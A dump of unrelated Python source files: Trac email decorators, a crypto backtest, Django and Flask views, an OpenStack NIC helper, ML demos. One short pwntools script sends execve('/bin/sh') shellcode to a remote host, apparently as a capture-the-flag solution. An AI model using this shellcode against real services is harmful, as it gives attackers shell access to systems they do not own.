class TicketSubjectEmailDecorator(Component):
    """Builds the e-mail Subject header for ticket announcements from a
    configurable Genshi mini-template."""

    implements(IAnnouncementEmailDecorator)

    ticket_email_subject = Option('announcer', 'ticket_email_subject',
            "Ticket #${ticket.id}: ${ticket['summary']} " \
            "{% if action %}[${action}]{% end %}",
            """Format string for ticket email subject. This is
            a mini genshi template that is passed the ticket
            event and action objects.""")

    def decorate_message(self, event, message, decorates=None):
        """Set the Subject header on ticket announcements, then hand off
        to the next decorator in the chain."""
        if event.realm == 'ticket':
            if event.changes:
                if 'status' in event.changes:
                    # NOTE(review): this local is never used -- the template
                    # below is given action=event.category instead. Looks
                    # like a leftover; confirm which value was intended.
                    action = 'Status -> %s' % (event.target['status'])
            template = NewTextTemplate(self.ticket_email_subject)
            subject = to_unicode(template.generate(
                ticket=event.target,
                event=event,
                action=event.category
            ).render())
            # Optional project-wide subject prefix, e.g. "[MyProject] ".
            prefix = self.config.get('announcer', 'email_subject_prefix')
            if prefix == '__default__':
                prefix = '[%s] ' % self.env.project_name
            if prefix:
                subject = "%s%s"%(prefix, subject)
            # Everything after ticket creation is a reply in the thread.
            if event.category != 'created':
                subject = 'Re: %s'%subject
            set_header(message, 'Subject', subject)
        return next_decorator(event, message, decorates)
class TicketAddlHeaderEmailDecorator(Component):
    """Adds X-Announcement-* headers carrying basic ticket fields so mail
    clients can filter announcements."""

    implements(IAnnouncementEmailDecorator)

    def decorate_message(self, event, message, decorates=None):
        """Attach ticket id/priority/severity headers, then delegate to the
        next decorator in the chain."""
        if event.realm == 'ticket':
            for field_name in ('id', 'priority', 'severity'):
                header = 'X-Announcement-%s' % field_name.capitalize()
                set_header(message, header, event.target[field_name])
        return next_decorator(event, message, decorates)
| 3,772 | 1,151 |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from pyalgotrade import strategy
from pyalgotrade import plotter
from pyalgotrade.broker.backtesting import Broker
from pyalgotrade.broker.backtesting import TradePercentage
from pyalgotrade.broker.slippage import VolumeShareSlippage
from pyalgotrade.bar import Frequency
from pyalgotrade.technical import ma
from pyalgotrade.stratanalyzer import sharpe
from pyalgotrade.stratanalyzer import returns
from ccwt_client.ccwt_feed import Feed
class MultiSymbols(strategy.BacktestingStrategy):
    """Cross-exchange BTC backtest: trades okex_BTCUSDT based on its spread
    versus bitmex_XBTUSD and a 15-bar SMA trend filter on the bitmex price."""

    def __init__(self, feed, instruments, broker):
        strategy.BacktestingStrategy.__init__(self, feed, broker)
        self.__instruments = instruments
        self.__sharesToBuy = {}
        # Initialize indicators for each instrument.
        ''' 技术指标
        SMA、EMA、WMA、VMAP、MACD、RSI、StochasticOscillator、BollingerBands、ATR、HurstExponent
        CumulativeReturn、LeastSquaresRegression、Slope、StdDev、ZScore
        '''
        self.__sma = {}
        for instrument in instruments:
            priceDS = feed[instrument].getPriceDataSeries()
            # 15-bar simple moving average of each instrument's price series.
            self.__sma[instrument] = ma.SMA(priceDS, 15)

    def getSMA(self, instrument):
        """Return the SMA data series tracked for *instrument*."""
        return self.__sma[instrument]

    def onBars(self, bars):
        """Per-bar logic: buy okex when it trades more than 3 below bitmex in
        an uptrend; sell half the position when the spread narrows in a
        downtrend."""
        # Example of iterating every instrument's bar in this event:
        #for instrument in bars.getInstruments():
        # self.info('%s price: %.6f' % (instrument, bars.getBar(instrument).getClose()))
        orders = self.getBroker().getActiveOrders('okex_BTCUSDT')
        if orders:
            self.info(str(orders))
        bitmex = bars.getBar('bitmex_XBTUSD')
        okex = bars.getBar('okex_BTCUSDT')
        bitmexSMA = self.getSMA('bitmex_XBTUSD')
        # Skip until both exchanges have a bar and the SMA has warmed up.
        if bitmex is None:
            return None
        if okex is None:
            return None
        if bitmexSMA[-1] is None:
            return None
        if bitmex is not None and okex is not None:
            # Entry: okex > 3 under bitmex while bitmex is above its SMA.
            if bitmex.getClose() - okex.getClose() > 3 and bitmex.getClose() > bitmexSMA[-1]:
                cash = self.getBroker().getCash()
                # Commit 10% of available cash per entry.
                size = cash * 0.1 / okex.getClose()
                '''
                size > 0 buy ; size < 0 sell;
                marketOrder:以市场价成交 onClose : True,用下一个bar的收盘价; False: 用下一个bar的开盘价,目前onClose True不支持一天内的bar
                limitOrder:限价成交
                buy:如果下一个bar低于limitPrice,成交价=开盘价;如果下一个bar包含limitPrice,成交价=min(open,limitPrice)
                sell:如果下一个bar高于limitPrice,成交价=开盘价;如果下一个bar包含limitPrice,成交价=max(open,limitPrice)
                stopOrder:止损单
                buy:如果下一个bar高于stopPrice,成交价=开盘价;如果包含stopPrice,成交价=max(open,stopPrice)
                sell:如果下一个bar低于stopPrice,成交价=开盘价;如果包含stopPrice,成交价=min(open,stopPrice)
                stopLimitOrder:限价止损单
                先判断是否到达止损价,然后再判断是否到了限定价格
                '''
                self.marketOrder('okex_BTCUSDT', size)
                self.info('cash %.2f ; size %.2f' % (cash, size))
                self.info('bitmex price %.6f ; okex price %.6f ; bitmexSMA %.6f' % (bitmex.getClose(), okex.getClose(), bitmexSMA[-1]))
            # Exit: spread below 4 while bitmex is under its SMA --
            # sell half of the current okex position.
            if bitmex.getClose() - okex.getClose() < 4 and bitmex.getClose() < bitmexSMA[-1]:
                okexShares = self.getBroker().getShares('okex_BTCUSDT')
                size = okexShares * -0.5
                self.marketOrder('okex_BTCUSDT', size)
                self.info('okexShares %.2f ; size %.2f' % (okexShares, size))
                self.info('bitmex price %.6f ; okex price %.6f ; bitmexSMA %.6f' % (bitmex.getClose(), okex.getClose(), bitmexSMA[-1]))
def main(plot):
    """Run the two-instrument backtest; optionally plot cash and returns."""
    instruments = ['bitmex_XBTUSD','okex_BTCUSDT']
    feed = Feed(Frequency.SECOND)
    feed.loadBars("bitmex_XBTUSD", test_back=True)
    feed.loadBars("okex_BTCUSDT", test_back=True)
    '''初始保证金'''
    initCash = 1000000
    '''手续费设置
    目前不支持多标的设置不同的手续费类型
    3种手续费类型:
    NoCommission:None 默认
    FixedPerTrade:固定金额
    TradePercentage:按比例收费
    '''
    # Commission: 0.03% of trade value (TradePercentage).
    commission = TradePercentage(0.0003)
    broker = Broker(initCash,feed,commission)
    # Optional slippage model (default is NoSlippage):
    #broker.getFillStrategy().setSlippageModel(VolumeShareSlippage)
    # Optional per-bar volume limit: at most bar volume * limit is filled.
    #broker.getFillStrategy().setVolumeLimit(0.1)
    strat = MultiSymbols(feed, instruments, broker)
    sharpeRatioAnalyzer = sharpe.SharpeRatio()
    strat.attachAnalyzer(sharpeRatioAnalyzer)
    returnsAnalyzer = returns.Returns()
    strat.attachAnalyzer(returnsAnalyzer)
    if plot:
        plt = plotter.StrategyPlotter(strat, False, False, True)
        plt.getOrCreateSubplot("cash").addCallback("Cash", lambda x: strat.getBroker().getCash())
        # Plot strategy vs. SPY cumulative returns.
        # plt.getOrCreateSubplot("returns").addDataSeries("SPY", cumret.CumulativeReturn(feed["SPY"].getPriceDataSeries()))
        plt.getOrCreateSubplot("returns").addDataSeries("Strategy", returnsAnalyzer.getCumulativeReturns())
    strat.run()
    print("Sharpe ratio: %.2f" % sharpeRatioAnalyzer.getSharpeRatio(0.05))
    print("Returns: %.2f %%" % (returnsAnalyzer.getCumulativeReturns()[-1] * 100))
    if plot:
        plt.plot()


if __name__ == "__main__":
    main(True)
class Message:
    """A simple value object pairing a subject with a payload.

    :param subject: topic/key identifying what the message is about.
    :param value: the message payload.
    :param options: optional extra options (defaults to None).
    """

    def __init__(self, subject, value, options=None):
        self.subject = subject
        self.value = value
        self.options = options

    def __repr__(self):
        # Debug-friendly representation; added for easier logging.
        return '{}(subject={!r}, value={!r}, options={!r})'.format(
            type(self).__name__, self.subject, self.value, self.options)
from django.http import HttpResponse
from django_weasyprint.utils import django_url_fetcher
from weasyprint import HTML
def html_to_pdf_response(html_string, pdf_filename):
    """Render an HTML string to PDF and wrap it in an HTTP response.

    :param html_string: the HTML document to render.
    :param pdf_filename: filename advertised in Content-Disposition.
    :returns: an ``HttpResponse`` carrying the PDF bytes.
    """
    document = HTML(
        string=html_string,
        url_fetcher=django_url_fetcher,
        base_url='file://abobrinha',
    )
    pdf_bytes = document.write_pdf()
    response = HttpResponse(pdf_bytes, content_type='application/pdf')
    response['Content-Disposition'] = f'filename="{pdf_filename}"'
    return response
| 470 | 141 |
# allows import of package from parent directory
import os
import sys
sys.path.insert(0, os.path.abspath(os.path.join(os.path.dirname(__file__), '..')))
import numpy as np
import matplotlib.pyplot as plt
from cary_reader import CaryData
data = CaryData.from_csv('test_data/berio_matrix_300_450.csv')
# converts the data to a pandas dataframe, with the excitation wavelengths as
# columns and the emission wavelengths as rows (index)
df = data.get_ex_em_matrix()
X, Y = np.meshgrid(df.index, df.columns)
Z = df.values.transpose()
levels = np.linspace(0, 150, 50)  # 50 evenly spaced contour levels between 0 and 150 intensity
plt.contourf(X, Y, Z, levels, cmap=plt.cm.jet)
plt.colorbar()
plt.xlabel('Emission (nm)')
plt.ylabel('Excitation (nm)')
"""Random number generators for random augmentation parametrization"""
from typing import Optional, Tuple
import numpy as np
import scipy.stats
class RandomSampler:
    """Samples random variables from a ``scipy.stats`` distribution."""

    def __init__(
        self,
        rv: scipy.stats.rv_continuous,
        shape: Tuple[int, ...] = (),
        bounds: Optional[Tuple[float, float]] = None,
    ):
        # Frozen scipy distribution, default sample shape, and optional
        # (low, high) clipping interval.
        self.rv = rv
        self.shape = shape
        self.bounds = bounds

    def __call__(self, shape=None):
        """Draw a sample of ``shape`` (default: the configured shape),
        clipped to ``bounds`` when bounds are set."""
        if shape is None:
            shape = self.shape
        sample = self.rv.rvs(size=shape)
        if self.bounds is not None:
            low, high = self.bounds
            sample = np.clip(sample, low, high)
        return sample
class Normal(RandomSampler):
    """Normal distribution sampler."""

    def __init__(
        self,
        mean: float = 0,
        sigma: float = 1,
        shape: Tuple[int, ...] = (),
        bounds: Optional[Tuple[float, float]] = None,
    ):
        # Freeze a Gaussian with the requested location/scale and delegate
        # sampling and clipping to the base class.
        super().__init__(
            rv=scipy.stats.norm(loc=mean, scale=sigma),
            shape=shape,
            bounds=bounds,
        )
class HalfNormal(RandomSampler):
    """Half-normal distribution sampler.

    See https://en.wikipedia.org/wiki/Half-normal_distribution.

    Note that all sampled values are positive, regardless of the parameters."""

    def __init__(
        self,
        sigma: float = 1,
        shape: Tuple[int, ...] = (),
        bounds: Optional[Tuple[float, float]] = None,
    ):
        # The half-normal is anchored at 0; only the scale is configurable.
        super().__init__(
            rv=scipy.stats.halfnorm(loc=0, scale=sigma),
            shape=shape,
            bounds=bounds,
        )
class RandInt(RandomSampler):
    """Discrete uniform distribution sampler.

    Outputs random integers in a defined range ``(low, high)`` with equal
    probability.

    By default (``low=0, high=2``), it generates binary values (0 or 1)."""

    def __init__(
        self,
        low: int = 0,
        high: int = 2,
        shape: Tuple[int, ...] = (),
    ):
        # ``high`` is exclusive, matching scipy.stats.randint semantics;
        # integer samples need no clipping, hence bounds=None.
        frozen = scipy.stats.randint(low=low, high=high)
        super().__init__(rv=frozen, shape=shape, bounds=None)
| 2,149 | 651 |
import torch as th
import numpy as np
'''
prediction:
gradient computation:
loss computation:
parameter updates:
'''
'''All Manual with numpy'''
# f = w*x
# f = 2.x
# Training data for f(x) = w * x with ground-truth w = 2.
X = np.array([1,2,3,4],dtype=np.float32)
Y = np.array([2,4,6,8],dtype=np.float32)

w = 0.0


def forward(x):
    """Model prediction f(x) = w * x (w is the module-level weight)."""
    return w*x


def loss(y,yp):
    """Mean squared error between targets ``y`` and predictions ``yp``."""
    return np.mean((y-yp)**2)


def gradient(x,y,yp):
    """Gradient of the MSE loss with respect to w.

    MSE   = 1/N * sum((w*x - y)**2)
    dJ/dw = 1/N * sum(2*x * (w*x - y))

    BUG FIX: the previous version returned np.dot(2*x, yp-y).mean(), i.e.
    the *sum* (.mean() on a scalar is a no-op), scaling the gradient by N
    relative to the derivative documented above.
    """
    return (2 * x * (yp - y)).mean()


print(f'prediction before training f(5)= {forward(5):.3f}')

# training hyper-parameters
lr = 0.01
n_iters = 100

for epoch in range(n_iters):
    # prediction (forward pass)
    y_pred = forward(X)
    # loss
    l = loss(Y,y_pred)
    # gradient of the loss with respect to w
    dw = gradient(X,Y,y_pred)
    # gradient-descent step
    w-=lr*dw
    if epoch%10==0:
        print(f'epoch {epoch+1}: w: {w:.8f}, loss = {l:.8f}')

print(f'Prediction after training: f(5) = {forward(5):.3f}')
| 879 | 411 |
from astropy.modeling.models import custom_model
@custom_model
def quadratic_limb_darkening(mu, a_ld=0., b_ld=0.):
    """ Define quadratic limb darkening model with two params. """
    # Quadratic law: I(mu)/I(1) = 1 - a*(1-mu) - b*(1-mu)^2, where mu is
    # the cosine of the angle between the line of sight and the surface
    # normal. Defaults a_ld=b_ld=0 give a uniform (undarkened) disc.
    return 1. - a_ld * (1. - mu) - b_ld * (1. - mu)**2
@custom_model
def nonlinear_limb_darkening(mu, c0=0., c1=0., c2=0., c3=0.):
    """ Define non-linear limb darkening model with four params. """
    # Four-coefficient law in half-integer powers of mu:
    # I(mu)/I(1) = 1 - sum_k c_k * (1 - mu^(k/2)), k = 1..4.
    # Defaults c0..c3 = 0 give a uniform (undarkened) disc.
    return (1. - (c0 * (1. - mu**0.5) + c1 * (1. - mu)
                  + c2 * (1. - mu**1.5) + c3 * (1. - mu**2)))
| 497 | 206 |
import socket
# Minimal hand-rolled HTTP server. Flow:
# 1. create socket  2. bind  3. listen  4. accept  5. recv  6. send
# 7. close -> back to accept
# After starting, open localhost:2000 in a browser to test.
# Browsers usually issue two requests: "GET / HTTP/1.1" and
# "GET /favicon.ico HTTP/1.1".
s = socket.socket()
# Allow quick restarts without "Address already in use" errors.
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
host = ''
port = 2000
s.bind((host, port))
# FIX: listen() only needs to be called once before accepting; it was
# previously re-issued on every loop iteration.
s.listen(5)
while True:
    print('before accept')
    # accept() blocks until a client connects, returning the connection
    # socket and the client address.
    connection, address = s.accept()
    print('after accept')
    buf = b''
    while True:
        cache = connection.recv(1024)
        buf += cache
        # A short read means the client has sent everything (heuristic).
        if len(cache) < 1024:
            break
    request = buf.decode('utf-8')
    print('客户端ip and request: {}\n{}'.format(address, request))
    response = b'HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n\r\n<h1>Hello, world</h1>'
    connection.sendall(response)
    connection.close()
| 831 | 399 |
# Copyright 2018 Red Hat, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import collections.abc
import logging
from openstack import exceptions as sdk_exc
from metalsmith import _utils
from metalsmith import exceptions
LOG = logging.getLogger(__name__)
class NICs(object):
    """Requested NICs."""

    def __init__(self, connection, node, nics, hostname=None):
        """
        :param connection: `openstacksdk.Connection` instance.
        :param node: `Node` the ports will be created for/attached to.
        :param nics: list of NIC request dicts, or None for no NICs.
        :param hostname: optional hostname used when naming created ports.
        :raises TypeError: if ``nics`` is not a list of dicts.
        """
        if nics is None:
            nics = []

        if not isinstance(nics, collections.abc.Sequence):
            raise TypeError("NICs must be a list of dicts")
        for nic in nics:
            if not isinstance(nic, collections.abc.Mapping):
                # Message fix: added the missing comma for readability.
                raise TypeError("Each NIC must be a dict, got %s" % nic)

        self._node = node
        self._connection = connection
        self._nics = nics
        self._validated = None
        self._hostname = hostname
        self.created_ports = []
        self.attached_ports = []

    def validate(self):
        """Validate provided NIC records."""
        if self._validated is not None:
            return

        result = []
        for nic in self._nics:
            if 'port' in nic:
                result.append(('port', self._get_port(nic)))
            elif 'network' in nic:
                result.append(('network', self._get_network(nic)))
            elif 'subnet' in nic:
                result.append(('subnet', self._get_subnet(nic)))
            else:
                # Message fix: "export" was a typo of "expected".
                raise exceptions.InvalidNIC(
                    'Unknown NIC record type, expected "port", "subnet" or '
                    '"network", got %s' % nic)

        self._validated = result

    def create_and_attach_ports(self):
        """Attach ports to the node, creating them if requested."""
        self.validate()
        for nic_type, nic in self._validated:
            if nic_type != 'port':
                # The 'binding:host_id' must be set to ensure IP allocation
                # is not deferred.
                # See: https://storyboard.openstack.org/#!/story/2009715
                port = self._connection.network.create_port(
                    binding_host_id=self._node.id, **nic)
                self.created_ports.append(port.id)
                LOG.info('Created port %(port)s for node %(node)s with '
                         '%(nic)s', {'port': _utils.log_res(port),
                                     'node': _utils.log_res(self._node),
                                     'nic': nic})
            else:
                # The 'binding:host_id' must be set to ensure IP allocation
                # is not deferred.
                # See: https://storyboard.openstack.org/#!/story/2009715
                self._connection.network.update_port(
                    nic, binding_host_id=self._node.id)
                port = nic

            self._connection.baremetal.attach_vif_to_node(self._node,
                                                          port.id)
            LOG.info('Attached port %(port)s to node %(node)s',
                     {'port': _utils.log_res(port),
                      'node': _utils.log_res(self._node)})
            self.attached_ports.append(port.id)

    def detach_and_delete_ports(self):
        """Detach attached port and delete previously created ones."""
        detach_and_delete_ports(self._connection, self._node,
                                self.created_ports, self.attached_ports)

    def _get_port(self, nic):
        """Validate and get the NIC information for a port.

        :param nic: NIC information in the form ``{"port": "<port ident>"}``.
        :returns: `Port` object to use.
        """
        unexpected = set(nic) - {'port'}
        if unexpected:
            raise exceptions.InvalidNIC(
                'Unexpected fields for a port: %s' % ', '.join(unexpected))
        try:
            port = self._connection.network.find_port(
                nic['port'], ignore_missing=False)
        except sdk_exc.SDKException as exc:
            raise exceptions.InvalidNIC(
                'Cannot find port %(port)s: %(error)s' %
                {'port': nic['port'], 'error': exc})

        return port

    def _get_network(self, nic):
        """Validate and get the NIC information for a network.

        :param nic: NIC information in the form ``{"network": "<net ident>"}``
            or ``{"network": "<net ident>", "fixed_ip": "<desired IP>"}``.
        :returns: keyword arguments to use when creating a port.
        """
        unexpected = set(nic) - {'network', 'fixed_ip'}
        if unexpected:
            raise exceptions.InvalidNIC(
                'Unexpected fields for a network: %s' % ', '.join(unexpected))
        try:
            network = self._connection.network.find_network(
                nic['network'], ignore_missing=False)
        except sdk_exc.SDKException as exc:
            raise exceptions.InvalidNIC(
                'Cannot find network %(net)s: %(error)s' %
                {'net': nic['network'], 'error': exc})

        port_args = {'network_id': network.id}
        if nic.get('fixed_ip'):
            port_args['fixed_ips'] = [{'ip_address': nic['fixed_ip']}]
        if self._hostname:
            port_args['name'] = '%s-%s' % (self._hostname, network.name)

        return port_args

    def _get_subnet(self, nic):
        """Validate and get the NIC information for a subnet.

        :param nic: NIC information in the form ``{"subnet": "<id or name>"}``.
        :returns: keyword arguments to use when creating a port.
        """
        unexpected = set(nic) - {'subnet'}
        if unexpected:
            raise exceptions.InvalidNIC(
                'Unexpected fields for a subnet: %s' % ', '.join(unexpected))
        try:
            subnet = self._connection.network.find_subnet(
                nic['subnet'], ignore_missing=False)
        except sdk_exc.SDKException as exc:
            raise exceptions.InvalidNIC(
                'Cannot find subnet %(sub)s: %(error)s' %
                {'sub': nic['subnet'], 'error': exc})
        try:
            network = self._connection.network.get_network(subnet.network_id)
        except sdk_exc.SDKException as exc:
            raise exceptions.InvalidNIC(
                'Cannot find network %(net)s for subnet %(sub)s: %(error)s' %
                {'net': subnet.network_id, 'sub': nic['subnet'], 'error': exc})

        port_args = {'network_id': network.id,
                     'fixed_ips': [{'subnet_id': subnet.id}]}
        if self._hostname:
            port_args['name'] = '%s-%s' % (self._hostname, network.name)

        return port_args
def detach_and_delete_ports(connection, node, created_ports, attached_ports):
    """Detach attached port and delete previously created ones.

    :param connection: `openstacksdk.Connection` instance.
    :param node: `Node` object to detach ports from.
    :param created_ports: List of IDs of previously created ports.
    :param attached_ports: List of IDs of previously attached_ports.
    """
    # Detach every port we touched (attached or created), each at most once.
    to_detach = set(attached_ports) | set(created_ports)
    for port_id in to_detach:
        LOG.debug('Detaching port %(port)s from node %(node)s',
                  {'port': port_id, 'node': _utils.log_res(node)})
        try:
            connection.baremetal.detach_vif_from_node(node, port_id)
        except Exception as exc:
            # Best effort: the VIF may already be gone.
            LOG.debug('Failed to remove VIF %(vif)s from node %(node)s, '
                      'assuming already removed: %(exc)s',
                      {'vif': port_id, 'node': _utils.log_res(node),
                       'exc': exc})

    # Only ports we created ourselves are deleted.
    for port_id in created_ports:
        LOG.debug('Deleting port %s', port_id)
        try:
            connection.network.delete_port(port_id, ignore_missing=False)
        except Exception as exc:
            LOG.warning('Failed to delete neutron port %(port)s: %(exc)s',
                        {'port': port_id, 'exc': exc})
        else:
            LOG.info('Deleted port %(port)s for node %(node)s',
                     {'port': port_id, 'node': _utils.log_res(node)})
| 8,515 | 2,427 |
from pydantic import Field
from pystratis.api import Model
from pystratis.core.types import hexstr
# noinspection PyUnresolvedReferences
class SendTransactionRequest(Model):
    """A request model for multiple api endpoints.

    Args:
        transaction_hex (hexstr): The hexified transaction.
    """
    # Serialized to/from the JSON key 'hex' via the pydantic field alias.
    transaction_hex: hexstr = Field(alias='hex')
| 355 | 100 |
from .exchange import Exchange
class ExchangeFetchFeedback(Exchange):
    """Subclass of :class:`Exchange` that adds no behavior of its own;
    it exists so this exchange kind can be distinguished by type."""
    pass
| 81 | 22 |
from pwn import *
context.arch = 'amd64'
# Local debugging alternatives (disabled):
#io = process("./shellcode")
io = remote('34.92.37.22', 10002)
#gdb.attach(io,'handle SIGALRM nostop noprint\nb *0x4008cb\nc')
io.recvuntil(":\n")
# Payload: hand-written amd64 shellcode. The bytes "\x2f\x62\x69\x6e\x2f\x73\x68"
# spell "/bin/sh" and 0x3b is the execve syscall number, so this appears to
# spawn a shell via execve("/bin/sh", 0, 0) with a jmp/call trick to obtain
# the string's address. NOTE(review): do not alter the bytes -- offsets are
# tuned to the remote binary.
io.sendline('\x00\x6a\x3b\xeb\x10\x48\x31\xc0\x5f\x48\x31\xf6\x48\x31\xd2\x48\x83\xc0\x3b\x0f\x05'+'\xe8\xeb\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x00')
io.interactive()
| 362 | 237 |
from django.contrib import messages
from django.http import HttpResponseRedirect
from django.utils.functional import cached_property
from django.utils.html import format_html
from django.utils.safestring import mark_safe
from django.template.loader import render_to_string
from wagtail.core.blocks import ChooserBlock
from .models import Form
from .widgets import AdminFormChooser
# class FormBlock(StructBlock):
# form =
class FormChooserBlock(ChooserBlock):
    """StreamField block that embeds a chooseable ``Form`` and processes its
    submission inline on the hosting page."""

    @cached_property
    def target_model(self):
        # Model class the chooser selects.
        return Form

    @cached_property
    def widget(self):
        # Admin-side widget used to pick a form.
        return AdminFormChooser

    def get_context(self, value, parent_context=None):
        """Build the template context; handles a POST submission when the
        parent context carries the request."""
        context = super().get_context(value, parent_context=parent_context)
        request = context.get('request')
        if request and request.method == 'POST':
            form = value.get_form(request.POST, request.FILES, page=value, user=request.user)
            if form.is_valid():
                value.process_form_submission(form)
                messages.add_message(request, messages.SUCCESS, 'Thank you for submitting the form.')
                # POST/redirect/GET: redirect back to the same page and
                # render a fresh, unbound form.
                context['redirect'] = request.path_info
                form = value.get_form(page=value, user=request.user)
            else:
                messages.add_message(request, messages.ERROR, 'There was an error on the form, please correct it.')
        else:
            form = value.get_form(page=value, user=request.user)
        context['form'] = form
        if value.display_title:
            context['form_title'] = value.title
        if value.button_alignment:
            context['button_alignment'] = value.button_alignment
        return context

    def render(self, value, context=None):
        """
        Return a text rendering of 'value', suitable for display on templates. By default, this will
        use a template (with the passed context, supplemented by the result of get_context) if a
        'template' property is specified on the block, and fall back on render_basic otherwise.
        """
        template = self.get_template(context=context, value=value)
        if not template:
            return self.render_basic(value, context=context)
        if context is None:
            new_context = self.get_context(value)
        else:
            new_context = self.get_context(value, parent_context=dict(context))
        return mark_safe(render_to_string(template, new_context))

    def get_template(self, context=None, value=None):
        # Fall back to the block's default template unless the chosen form
        # specifies a custom one.
        if not value.form_template or value.form_template == 'standard':
            return getattr(self.meta, 'template', None)
        return value.form_template

    class Meta:
        icon = "form"
        template = 'customforms/blocks/form.html'
| 2,753 | 734 |
from django.contrib.auth import get_user_model
from django.contrib.auth.backends import BaseBackend
from django.contrib.auth.hashers import check_password
from .models import OneTimePass
User = get_user_model()
# https://docs.djangoproject.com/en/3.2/topics/auth/customizing/#authentication-backends
class OneTimePassBackend(BaseBackend):
    """Authenticates users against a single-use password record, creating
    the Django user account on first successful login."""

    def authenticate(self, request, onetimepass_id=None, password=None):
        """Return the matching ``User`` (creating it if needed) when the
        one-time password checks out; otherwise record the failed attempt
        and return None."""
        try:
            onetimepass = OneTimePass.objects.get(id=onetimepass_id)
        except OneTimePass.DoesNotExist:
            return None
        if onetimepass.password is None or password is None:
            return None
        if (
            check_password(password, onetimepass.password)
            and onetimepass.is_alive
            and not onetimepass.is_rate_limited
        ):
            try:
                user = User.objects.get(email=onetimepass.email)
            except User.DoesNotExist:
                # First login: create a passwordless account keyed by email.
                user = User.objects.create_user(
                    username=onetimepass.email, email=onetimepass.email, password=None
                )
            # Single use: the record is destroyed on successful login.
            onetimepass.delete()
            return user
        # Failed attempt: count it so is_rate_limited can kick in.
        onetimepass.attempts += 1
        onetimepass.save()
        return None

    def get_user(self, user_id):
        """Standard backend hook: fetch a user by primary key."""
        try:
            return User.objects.get(pk=user_id)
        except User.DoesNotExist:
            return None
| 1,382 | 387 |
from flask import Blueprint,render_template,flash,redirect,url_for,send_from_directory,current_app
from flask_login import current_user
from models import Student,Course
from forms.students import UploadAvatarForm,CropAvatarForm
from extensions import avatars,db
from utils import flash_errors
index_stu_bp = Blueprint('index_stu',__name__)
@index_stu_bp.route('/')
def index_stu():
    """Student landing page."""
    return render_template('stu/student.html')


@index_stu_bp.route('/mycourse')
def course():
    """Student course overview page."""
    return render_template('stu/course.html')


@index_stu_bp.route('/myinfo')
def info():
    """Show the logged-in student's profile details."""
    info = Student.query.filter_by(id=current_user.id).first()
    return render_template('stu/info.html',info=info)


@index_stu_bp.route('/setting')
def setting():
    """Settings page with avatar upload and crop forms."""
    upload_form = UploadAvatarForm()
    crop_form = CropAvatarForm()
    return render_template('stu/setting.html', upload_form=upload_form, crop_form=crop_form)
@index_stu_bp.route('/setting/upload',methods=['POST'])
def upload_avatar():
    """Handle the avatar upload form and store the raw image filename on
    the logged-in student's record."""
    form = UploadAvatarForm()
    if form.validate_on_submit():
        image = form.image.data
        filename = avatars.save_avatar(image)
        stu_pic = Student.query.filter_by(id = current_user.id).first()
        stu_pic.pic = filename
        # stu_pic is already tracked by the session, so no add() is needed.
        db.session.commit()
        flash('Image uploaded, please crop.', 'success')
    flash_errors(form)
    return redirect(url_for('.setting'))


@index_stu_bp.route('/setting/<path:filename>')
def get_avatar(filename):
    """Serve a stored avatar file from the configured avatars directory."""
    return send_from_directory(current_app.config['AVATARS_SAVE_PATH'], filename)
@index_stu_bp.route('/settings/avatar/crop', methods=['POST'])
def crop_avatar():
    """Crop the previously uploaded avatar into the three stored sizes."""
    form = CropAvatarForm()
    if form.validate_on_submit():
        student = Student.query.filter_by(id=current_user.id).first()
        # The helper returns the generated filenames in small/medium/large order.
        cropped = avatars.crop_avatar(student.pic,
                                      form.x.data,
                                      form.y.data,
                                      form.w.data,
                                      form.h.data)
        student.pic_s = cropped[0]
        student.pic_m = cropped[1]
        student.pic_l = cropped[2]
        # Row already tracked by the session; commit persists the change.
        db.session.commit()
        flash('Avatar updated.', 'success')
    flash_errors(form)
    return redirect(url_for('.setting'))
| 2,286 | 832 |
from pkg_resources import resource_filename
import numpy as np
import matplotlib.pyplot as plt
from ..esn import ESN
from ..utils import chunk_data, standardize_traindata, scale_data
# Example using real data, one shot prediction
# Load hourly PJM power-consumption data (second CSV column only).
fname = resource_filename('parallel_esn', 'data/PJM_Load_hourly.csv')
data = np.loadtxt(fname, delimiter=',', skiprows=1, usecols=[1])
tot_len = data.shape[0]
val_len = tot_len//10
train_len = tot_len-val_len
# Split up loaded data with 9/10ths going to training data
# and 1/10th going to validation data
train_dat = data[:train_len]
val_dat = data[train_len:]
# Standardize training data to make it more neural network-friendly
train_dat, mu, sigma = standardize_traindata(train_dat)
# Scale validation data by mean and s.dev determined by training data
val_dat = scale_data(val_dat, mu, sigma)
windowsize = 160
# Chunk the series into (input, target) windows with stride 20.
trainU, trainY = chunk_data(train_dat, windowsize, 20)
valU, valY = chunk_data(val_dat, windowsize, 20)
# Create a new ESN
# NOTE(review): positional args presumably (input_dim, window, output_dim,
# reservoir/esn count) -- confirm against the ESN constructor signature.
esn = ESN(1, windowsize, 1, 3)
loss = esn.train_validate(trainU, trainY, valU, valY)
print("validation loss = {}".format(loss))
time = np.arange(windowsize)
# Plot input window, one-shot prediction, and the observed continuation.
plt.plot(time, valU[0, 0, :], 'ob', label='input')
pred = esn.predict(valU[0, 0:1, :])
plt.plot(time+windowsize, pred[0, :], '-r', label='predicted')
plt.plot(time+windowsize, valY[0, 0, :], '^g', label='observed')
plt.title("PJM Standardized Power Consumption (One Shot)")
plt.ylabel("Arb. Units.")
plt.xlabel("Hours")
plt.legend(loc=2, numpoints=1)
plt.show()
| 1,507 | 570 |
# Copyright 2021 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""Tests on mindspore.explainer.ImageClassificationRunner."""
import os
import shutil
from random import random
from unittest.mock import patch
